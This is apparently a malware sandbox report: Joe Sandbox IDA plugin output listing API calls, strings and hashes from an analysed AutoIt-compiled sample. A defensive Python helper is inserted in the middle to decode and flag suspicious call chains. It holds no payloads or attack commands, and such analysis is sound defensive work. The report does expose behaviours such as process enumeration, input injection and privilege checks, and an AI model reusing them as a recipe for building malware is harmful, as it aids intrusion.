              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$DestroyWindow
              • String ID: msctls_updown32
              • API String ID: 4014797782-2298589950
              • Opcode ID: d10cfbd617b68d94fc6a4d53ba685a82c9c26ccafe010753bbbc337ba23c418a
              • Instruction ID: 40424fa5bee75a807e35ada9b944006c78102cbdb22b627ac0217f90d27794e9
              • Opcode Fuzzy Hash: d10cfbd617b68d94fc6a4d53ba685a82c9c26ccafe010753bbbc337ba23c418a
              • Instruction Fuzzy Hash: 35216DB5600209AFEB11DF68DCD1DB737ADEF9A3A4B044059FA019B3A1CB74EC51CA64
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
              • API String ID: 176396367-2734436370
              • Opcode ID: 458baf49792f4e40c3bb1b0b3af463a518df9fbc4286d66df2102fe7904b3fdb
              • Instruction ID: bacd86d3e858ff6217c0d82db2bb9a88c992e1bca43e5efbfd00c3a4e5fc0e14
              • Opcode Fuzzy Hash: 458baf49792f4e40c3bb1b0b3af463a518df9fbc4286d66df2102fe7904b3fdb
              • Instruction Fuzzy Hash: 1A215BB2205610A6E331AB249C03FB773D99F51300F50402AFB4A97183FBD9AD95C2E9
              APIs
              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00763840
              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00763850
              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00763876
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$MoveWindow
              • String ID: Listbox
              • API String ID: 3315199576-2633736733
              • Opcode ID: b004571a43074dd32b4e269973127eea57797e16da87a1466730505667b9d28c
              • Instruction ID: fe75e9871b3483d1eb68118384b131939731943502bf08d5ebff0116ac817b3f
              • Opcode Fuzzy Hash: b004571a43074dd32b4e269973127eea57797e16da87a1466730505667b9d28c
              • Instruction Fuzzy Hash: 2421BE72610219BBEF218F54DC85EBB376AEF89760F108124F9069B190C6B9DC52CBA0
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 00744A08
              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00744A5C
              • SetErrorMode.KERNEL32(00000000,?,?,0076CC08), ref: 00744AD0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$InformationVolume
              • String ID: %lu
              • API String ID: 2507767853-685833217
              • Opcode ID: 88736f01990f067338aa17dcad6507fa95d52dec8dbb1bdd453ad98407896521
              • Instruction ID: 1d7f42c9a69ce4f66b0bef81adf5ff38ef5defd6926affee26270bb8a5724b4b
              • Opcode Fuzzy Hash: 88736f01990f067338aa17dcad6507fa95d52dec8dbb1bdd453ad98407896521
              • Instruction Fuzzy Hash: 80318571A00208AFDB51DF54C885EAA77F9EF05304F148099F905DB352DB75ED45CB61
              APIs
              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0076424F
              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00764264
              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00764271
              Strings
              Similarity
              • API ID: MessageSend
              • String ID: msctls_trackbar32
              • API String ID: 3850602802-1010561917
              • Opcode ID: 9fe7f0ae9ccfb68a6981fc619dc13063b80447185b742a9ec04703c2eb000e94
              • Instruction ID: 7bbe609f8ab5cf53e598c2bb5e16c284671f850ee0946b5a394f54dbaeea9766
              • Opcode Fuzzy Hash: 9fe7f0ae9ccfb68a6981fc619dc13063b80447185b742a9ec04703c2eb000e94
              • Instruction Fuzzy Hash: 1F110631240208BEEF205F29CC46FAB3BACFF85B64F110114FE56E2090D2B5DC519B14
              APIs
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
                • Part of subcall function 00732DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00732DC5
                • Part of subcall function 00732DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00732DD6
                • Part of subcall function 00732DA7: GetCurrentThreadId.KERNEL32 ref: 00732DDD
                • Part of subcall function 00732DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00732DE4
              • GetFocus.USER32 ref: 00732F78
                • Part of subcall function 00732DEE: GetParent.USER32(00000000), ref: 00732DF9
              • GetClassNameW.USER32(?,?,00000100), ref: 00732FC3
              • EnumChildWindows.USER32(?,0073303B), ref: 00732FEB
              Strings
              Similarity
              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
              • String ID: %s%d
              • API String ID: 1272988791-1110647743
              • Opcode ID: e0d4445714e65765eae1686e579efbb935125b4d1a08040e2304c7c25f187dfe
              • Instruction ID: 887d09f186c8bce824e969f4d3c776e8500d7e885fe8050e7939366c038ca45e
              • Opcode Fuzzy Hash: e0d4445714e65765eae1686e579efbb935125b4d1a08040e2304c7c25f187dfe
              • Instruction Fuzzy Hash: AD11A271700205ABEF557F60CC89EFD376AAF84304F04807AF9099B253DE7999468B74
              APIs
              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007658C1
              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007658EE
              • DrawMenuBar.USER32(?), ref: 007658FD
              Strings
              Similarity
              • API ID: Menu$InfoItem$Draw
              • String ID: 0
              • API String ID: 3227129158-4108050209
              • Opcode ID: ffad0def0f13d2263da7d31a44227255df1a1bd573a65feed165e8317ed7d498
              • Instruction ID: bb8d798c7b42eb1189047f17ec5f305e0f0b15b759f413a5ea120edbeda8dd64
              • Opcode Fuzzy Hash: ffad0def0f13d2263da7d31a44227255df1a1bd573a65feed165e8317ed7d498
              • Instruction Fuzzy Hash: 02018B31500348EFDB219F11DC44BAEBBB5FB45360F108099E88AD6151DB74AA94EF24
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8253753b864a3daf44eb555188ef87f633ac7682bed257e6c910e5f3f7479465
              • Instruction ID: cdca53d831ec80b7a9a20f072e284b40d4f6bed1f333797430e0f4dfafa3a108
              • Opcode Fuzzy Hash: 8253753b864a3daf44eb555188ef87f633ac7682bed257e6c910e5f3f7479465
              • Instruction Fuzzy Hash: 93C17C75A0020AEFEB14CFA4C8A8EAEB7B5FF48714F108598E505EB252D735ED41DB90
              APIs
              Similarity
              • API ID: Variant$ClearInitInitializeUninitialize
              • String ID:
              • API String ID: 1998397398-0
              • Opcode ID: 3c797e3134306c09a8fe332146ff964e4a4719a0df5244d677baa0b12027594a
              • Instruction ID: ab110ab4ba726a20137004dbefb56dde8aaae6da419b3913df00796c443cd1d3
              • Opcode Fuzzy Hash: 3c797e3134306c09a8fe332146ff964e4a4719a0df5244d677baa0b12027594a
              • Instruction Fuzzy Hash: 32A156756042009FC700DF28C485A6AB7E6EF88351F04895DFD8A9B362EB74EE05CB96
              APIs
              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0076FC08,?), ref: 007305F0
              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0076FC08,?), ref: 00730608
              • CLSIDFromProgID.OLE32(?,?,00000000,0076CC40,000000FF,?,00000000,00000800,00000000,?,0076FC08,?), ref: 0073062D
              • _memcmp.LIBVCRUNTIME ref: 0073064E
              Similarity
              • API ID: FromProg$FreeTask_memcmp
              • String ID:
              • API String ID: 314563124-0
              • Opcode ID: 51b789e23a84144422b5f9bab7c606f772b1a5cbeae1182c56737177ce12baba
              • Instruction ID: 14643ad8cec9f014846410a42d0494bb1c4970297969af7c41aacff3403e02b6
              • Opcode Fuzzy Hash: 51b789e23a84144422b5f9bab7c606f772b1a5cbeae1182c56737177ce12baba
              • Instruction Fuzzy Hash: 7B815C71A00109EFDB04DF94C994EEEB7B9FF89315F204198F506AB251DB75AE06CBA0
              APIs
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: ac7449862de37793cccf28df96c29ee6b0aad95c3aecc1afc115ba5fd4e0f20b
              • Instruction ID: 9ded31d98f96b9f742e07b3129599e4eab34caeb44a677261bc3a00c9c359610
              • Opcode Fuzzy Hash: ac7449862de37793cccf28df96c29ee6b0aad95c3aecc1afc115ba5fd4e0f20b
              • Instruction Fuzzy Hash: 56415C31600144EBDB216BFC8C4AAFE3AE6EF41770F544225FF19DA1D2E63C89819762
              APIs
              • GetWindowRect.USER32(0174EBD0,?), ref: 007662E2
              • ScreenToClient.USER32(?,?), ref: 00766315
              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00766382
              Similarity
              • API ID: Window$ClientMoveRectScreen
              • String ID:
              • API String ID: 3880355969-0
              • Opcode ID: f6bf5943e4a54002916e905dc0ee04c00ab54ede5f30f7929b8415f10dcb7526
              • Instruction ID: 64facde40cee0d18254da372a64f90f244da86788e41b0d8d4ce4715fa12eab9
              • Opcode Fuzzy Hash: f6bf5943e4a54002916e905dc0ee04c00ab54ede5f30f7929b8415f10dcb7526
              • Instruction Fuzzy Hash: 6D513A74A00249EFDF10DF69D8809AE7BB6FF85360F50815AF9169B290D734ED81CB50
              APIs
              • socket.WSOCK32(00000002,00000002,00000011), ref: 00751AFD
              • WSAGetLastError.WSOCK32 ref: 00751B0B
              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00751B8A
              • WSAGetLastError.WSOCK32 ref: 00751B94
              Similarity
              • API ID: ErrorLast$socket
              • String ID:
              • API String ID: 1881357543-0
              • Opcode ID: ad3b0f5c909d3c1e1f100733a746601fd1c737184abaafb267c9ac0fdb7eec95
              • Instruction ID: 974422cc96980774a948dfe48d44aac70c5fddf3f9d891e5f38b70e175fb0813
              • Opcode Fuzzy Hash: ad3b0f5c909d3c1e1f100733a746601fd1c737184abaafb267c9ac0fdb7eec95
              • Instruction Fuzzy Hash: 8A41B074600300AFE720AF24C886F6977E6AB44719F94844CF95A9F3D2D7B6DD41CB94
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a75bd3f182b5957677229351e99e0d151c9eae01ddabc56e3d296ac9727fda2b
              • Instruction ID: 17a4a0bf45e9cb12e9dbdb3e74fc3dfbb8614981e19d07e14129025cefb7a297
              • Opcode Fuzzy Hash: a75bd3f182b5957677229351e99e0d151c9eae01ddabc56e3d296ac9727fda2b
              • Instruction Fuzzy Hash: 3241E672A00344EFD7249F78CC45BAABBE9EF88710F10466AF145DB2C2D779AB418780
              APIs
              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00745783
              • GetLastError.KERNEL32(?,00000000), ref: 007457A9
              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007457CE
              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007457FA
              Similarity
              • API ID: CreateHardLink$DeleteErrorFileLast
              • String ID:
              • API String ID: 3321077145-0
              • Opcode ID: e4db08bf0b2bc42a7938af6c4ff62fc4d237c67751838d6469f675acbbfd2f1d
              • Instruction ID: 19d179772c79151587568ab2db40ac119efc8d2c874f9c7610a2558297df6b0c
              • Opcode Fuzzy Hash: e4db08bf0b2bc42a7938af6c4ff62fc4d237c67751838d6469f675acbbfd2f1d
              • Instruction Fuzzy Hash: 1F413B39600611DFCB11EF15C444A5EBBE2EF89720B19C489EC4AAB362DB34FD00CB96
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,006F6D71,00000000,00000000,006F82D9,?,006F82D9,?,00000001,006F6D71,?,00000001,006F82D9,006F82D9), ref: 0070D910
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070D999
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0070D9AB
              • __freea.LIBCMT ref: 0070D9B4
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: b476851f3a4df5968cb5d86068522fa21d12f590d995bad01b374c44a84a9b51
              • Instruction ID: c1b40e17bcf029e3c4a033e22c42b00e08f0d2232240b6c3c6f0f950d9e275fc
              • Opcode Fuzzy Hash: b476851f3a4df5968cb5d86068522fa21d12f590d995bad01b374c44a84a9b51
              • Instruction Fuzzy Hash: 9931AB72A1020AEBDF25DFA5DC45EAE7BE5EB41310B054268FC05D6291EB39ED50CBA0
              APIs
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00765352
              • GetWindowLongW.USER32(?,000000F0), ref: 00765375
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00765382
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007653A8
              Similarity
              • API ID: LongWindow$InvalidateMessageRectSend
              • String ID:
              • API String ID: 3340791633-0
              • Opcode ID: c830634590ab639b2e6a12a51eafe71ae96d4850040d1802024a1102fca038ce
              • Instruction ID: 74a88d587b45ce700f330a99fcbc8322841d25d23700ca04147ccd12ebafb0dd
              • Opcode Fuzzy Hash: c830634590ab639b2e6a12a51eafe71ae96d4850040d1802024a1102fca038ce
              • Instruction Fuzzy Hash: ED31D234A55A08EFEB309E16CC05BE93761AB05B98F584102FE13963E1C7BC9D40FB45
              APIs
              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0073ABF1
              • SetKeyboardState.USER32(00000080,?,00008000), ref: 0073AC0D
              • PostMessageW.USER32(00000000,00000101,00000000), ref: 0073AC74
              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0073ACC6
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: b12347610f4bfd827f86380e5de31e703913f6a021e043e15321e306ae1e54c6
              • Instruction ID: 4b7b3b1ac9315c5ddcbe1a6d3e6fb4fa1a44309f0cfef13c5712f65b20f4a8fd
              • Opcode Fuzzy Hash: b12347610f4bfd827f86380e5de31e703913f6a021e043e15321e306ae1e54c6
              • Instruction Fuzzy Hash: EF311631A44318BFFB258B65CC0A7FABBA5AB45310F08621AE4C1521D2C37D8D818776
              APIs
              • ClientToScreen.USER32(?,?), ref: 0076769A
              • GetWindowRect.USER32(?,?), ref: 00767710
              • PtInRect.USER32(?,?,00768B89), ref: 00767720
              • MessageBeep.USER32(00000000), ref: 0076778C
              Similarity
              • API ID: Rect$BeepClientMessageScreenWindow
              • String ID:
              • API String ID: 1352109105-0
              • Opcode ID: a71a00106a43d1d5bf74f2ca9466bbef521f587560e85d651f8a231fb5b32f29
              • Instruction ID: a162db6af1d08b6b5ce15c8300c3bf2b3e68ffba855fc64720179607831c32cf
              • Opcode Fuzzy Hash: a71a00106a43d1d5bf74f2ca9466bbef521f587560e85d651f8a231fb5b32f29
              • Instruction Fuzzy Hash: A441BF34605254DFDB09CF58C894EA977F4FF49398F5580A8E8169B261D738E941CF90
              APIs
              • GetForegroundWindow.USER32 ref: 007616EB
                • Part of subcall function 00733A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733A57
                • Part of subcall function 00733A3D: GetCurrentThreadId.KERNEL32 ref: 00733A5E
                • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
              • GetCaretPos.USER32(?), ref: 007616FF
              • ClientToScreen.USER32(00000000,?), ref: 0076174C
              • GetForegroundWindow.USER32 ref: 00761752
              Similarity
              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
              • String ID:
              • API String ID: 2759813231-0
              • Opcode ID: 3708eba034757c44ff94988e3667f076601aa2e5a7953d5bec0c509cc885c0c4
              • Instruction ID: daa5d4ddb4cd0e98bb9d438c3849bb0efcdea4d948975f3828bb52b710f76e9b
              • Opcode Fuzzy Hash: 3708eba034757c44ff94988e3667f076601aa2e5a7953d5bec0c509cc885c0c4
              • Instruction Fuzzy Hash: 50314371D00249AFD700DFA9C885CAEBBF9EF48314B5480AAE456E7312D7359E45CBA0
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 0073D501
              • Process32FirstW.KERNEL32(00000000,?), ref: 0073D50F
              • Process32NextW.KERNEL32(00000000,?), ref: 0073D52F
              • CloseHandle.KERNEL32(00000000), ref: 0073D5DC
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
              • String ID:
              • API String ID: 420147892-0
              • Opcode ID: 43102ead6edb843ac6589a8d48497081928a2c77253a653b4f6baefeb229450a
              • Instruction ID: a6705e946702535b3b589dc34347f29cdf0d0865955024380f33c3964bd5147c
              • Opcode Fuzzy Hash: 43102ead6edb843ac6589a8d48497081928a2c77253a653b4f6baefeb229450a
              • Instruction Fuzzy Hash: BF31E4721083009FD315EF50D881ABFBBF8EF99344F04082DF582872A2EB719944CBA2
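Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python triage helper for the per-function API records above. It parses the plugin's "API.MODULE(args), ref: ADDR" lines, resolves wsock32 ordinal imports, names the Win32 constants hidden in the hex arguments, and flags call chains that deserve a second look. Applied to two records from this listing it shows why the raw numbers matter: socket(00000002,00000002,00000011) followed by #21(?,0000FFFF,00000020,...) in the function at 00751AFD decodes to socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) and setsockopt(s, SOL_SOCKET, SO_BROADCAST, ...), that is a UDP socket with broadcast enabled, and the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW sequence at 0073D501 is a full walk of the process list, the usual first step of looking for analysis tools. The ordinal-to-name mapping (21 = setsockopt, 23 = socket) and the constant tables come from the standard Winsock and Win32 headers and are assumptions of this helper, not something the report states; the chain labels are names chosen here. The two embedded records are copied from the listing as printed.

```python
"""Added triage helper (not Joe Sandbox code) for the per-function "APIs" records in
this listing: parse the lines, name the constants in the hex arguments, flag chains."""
import re
from dataclasses import dataclass

# One API line; "(args)" and the "Part of subcall function X:" prefix are optional.
_API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>#?\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# wsock32.dll exports the BSD socket calls by ordinal, printed by the plugin as "#N".
# Assumption: the standard Winsock ordinal table (21 = setsockopt, 23 = socket).
_WSOCK32_ORDINALS = {21: "setsockopt", 23: "socket"}
_AF, _SOCKTYPE = {2: "AF_INET", 23: "AF_INET6"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
_PROTO, _SOL = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}, {0xFFFF: "SOL_SOCKET"}
_SO = {0x4: "SO_REUSEADDR", 0x20: "SO_BROADCAST"}
_TBM = {0x405: "TBM_SETPOS", 0x406: "TBM_SETRANGE", 0x414: "TBM_SETPAGESIZE"}

@dataclass
class Call:
    api: str          # ordinal imports already resolved to a name where known
    module: str
    args: list        # int per argument, None where the plugin printed "?"
    ref: int
    caller: str = ""  # set for "Part of subcall function" lines

def parse_apis(block: str) -> list:
    calls = []
    for line in block.splitlines():
        m = _API_LINE.match(line)
        if not m:     # "APIs" header, "Strings", hashes, ...
            continue
        api, module, raw = m.group("api"), m.group("module").upper(), m.group("args")
        if module == "WSOCK32" and api.startswith("#"):
            api = _WSOCK32_ORDINALS.get(int(api[1:]), api)
        args = [] if raw is None else [
            None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(Call(api, module, args, int(m.group("ref"), 16), m.group("caller") or ""))
    return calls

def _name(table: dict, value) -> str:
    return "?" if value is None else table.get(value, f"0x{value:X}")

def decode(c: Call) -> str:
    """Render one call with known constants named; unknown values stay hex."""
    a, key = c.args, (c.module, c.api)
    if key == ("WSOCK32", "socket") and len(a) >= 3:
        body = f"{_name(_AF, a[0])}, {_name(_SOCKTYPE, a[1])}, {_name(_PROTO, a[2])}"
    elif key == ("WSOCK32", "setsockopt") and len(a) >= 3:
        body = f"s, {_name(_SOL, a[1])}, {_name(_SO, a[2])}, ..."
    elif key == ("USER32", "SendMessageW") and len(a) >= 2:
        body = f"hwnd, {_name(_TBM, a[1])}, ..."  # TBM_* names assume a trackbar target
    else:
        body = ", ".join("?" if v is None else f"0x{v:X}" for v in a)
    return f"{c.api}({body}) @ {c.ref:08X}"

# Ordered call patterns: every predicate must match, in order, inside one record.
_CHAINS = [
    ("process-enumeration", [lambda c: c.api == "CreateToolhelp32Snapshot",
                             lambda c: c.api == "Process32FirstW",
                             lambda c: c.api == "Process32NextW"]),
    ("udp-broadcast-socket", [lambda c: c.api == "socket" and c.args[1:2] == [2],        # SOCK_DGRAM
                              lambda c: c.api == "setsockopt" and c.args[2:3] == [0x20]]),  # SO_BROADCAST
]

def flag_chains(calls: list) -> list:
    hits = []
    for label, preds in _CHAINS:
        i = 0
        for c in calls:
            if preds[i](c):
                i += 1
                if i == len(preds):
                    hits.append(label)
                    break
    return hits

def triage(block: str):
    """Return (decoded call lines, chain labels) for one record's APIs text."""
    calls = parse_apis(block)
    return [decode(c) for c in calls], flag_chains(calls)

# Two records copied verbatim from the listing above.
SAMPLE_RECORDS = {
    "udp": """APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00751AFD
• WSAGetLastError.WSOCK32 ref: 00751B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00751B8A
• WSAGetLastError.WSOCK32 ref: 00751B94""",
    "procs": """APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0073D501
• Process32FirstW.KERNEL32(00000000,?), ref: 0073D50F
• Process32NextW.KERNEL32(00000000,?), ref: 0073D52F
• CloseHandle.KERNEL32(00000000), ref: 0073D5DC""",
}

if __name__ == "__main__":
    for name, block in SAMPLE_RECORDS.items():
        lines, flags = triage(block)
        print(name, flags, *lines, sep="\n  ")
```

Run as a script it prints the decoded calls and chain labels for both embedded records; to triage a whole report, pass each function's APIs block to triage() and sort the functions by the labels they collect. Calls the plugin prints as subcalls keep their caller address in Call.caller, so a chain spread over a helper and its caller can still be matched in listing order.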
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • GetCursorPos.USER32(?), ref: 00769001
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00727711,?,?,?,?,?), ref: 00769016
              • GetCursorPos.USER32(?), ref: 0076905E
              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00727711,?,?,?), ref: 00769094
              Similarity
              • API ID: Cursor$LongMenuPopupProcTrackWindow
              • String ID:
              • API String ID: 2864067406-0
              APIs
              • GetFileAttributesW.KERNEL32(?,0076CB68), ref: 0073D2FB
              • GetLastError.KERNEL32 ref: 0073D30A
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0073D319
              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0076CB68), ref: 0073D376
              Similarity
              • API ID: CreateDirectory$AttributesErrorFileLast
              • String ID:
              • API String ID: 2267087916-0
              APIs
                • Part of subcall function 00731014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0073102A
                • Part of subcall function 00731014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00731036
                • Part of subcall function 00731014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731045
                • Part of subcall function 00731014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0073104C
                • Part of subcall function 00731014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731062
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007315BE
              • _memcmp.LIBVCRUNTIME ref: 007315E1
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00731617
              • HeapFree.KERNEL32(00000000), ref: 0073161E
              Similarity
              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
              • String ID:
              • API String ID: 1592001646-0
              APIs
              • GetWindowLongW.USER32(?,000000EC), ref: 0076280A
              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00762824
              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00762832
              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00762840
              Similarity
              • API ID: Window$Long$AttributesLayered
              • String ID:
              • API String ID: 2169480361-0
              APIs
                • Part of subcall function 00738D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0073790A,?,000000FF,?,00738754,00000000,?,0000001C,?,?), ref: 00738D8C
                • Part of subcall function 00738D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00738DB2
                • Part of subcall function 00738D7D: lstrcmpiW.KERNEL32(00000000,?,0073790A,?,000000FF,?,00738754,00000000,?,0000001C,?,?), ref: 00738DE3
              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00738754,00000000,?,0000001C,?,?,00000000), ref: 00737923
              • lstrcpyW.KERNEL32(00000000,?), ref: 00737949
              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00738754,00000000,?,0000001C,?,?,00000000), ref: 00737984
              Strings
              Similarity
              • API ID: lstrcmpilstrcpylstrlen
              • String ID: cdecl
              • API String ID: 4031866154-3896280584
              APIs
              • SendMessageW.USER32(?,00001060,?,00000004), ref: 007656BB
              • _wcslen.LIBCMT ref: 007656CD
              • _wcslen.LIBCMT ref: 007656D8
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00765816
              Similarity
              • API ID: MessageSend_wcslen
              • String ID:
              • API String ID: 455545452-0
              APIs
              • SendMessageW.USER32(?,000000B0,?,?), ref: 00731A47
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00731A59
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00731A6F
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00731A8A
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 0073E1FD
              • MessageBoxW.USER32(?,?,?,?), ref: 0073E230
              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0073E246
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0073E24D
              Similarity
              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
              • String ID:
              • API String ID: 2880819207-0
              APIs
              • CreateThread.KERNEL32(00000000,?,006FCFF9,00000000,00000004,00000000), ref: 006FD218
              • GetLastError.KERNEL32 ref: 006FD224
              • __dosmaperr.LIBCMT ref: 006FD22B
              • ResumeThread.KERNEL32(00000000), ref: 006FD249
              Similarity
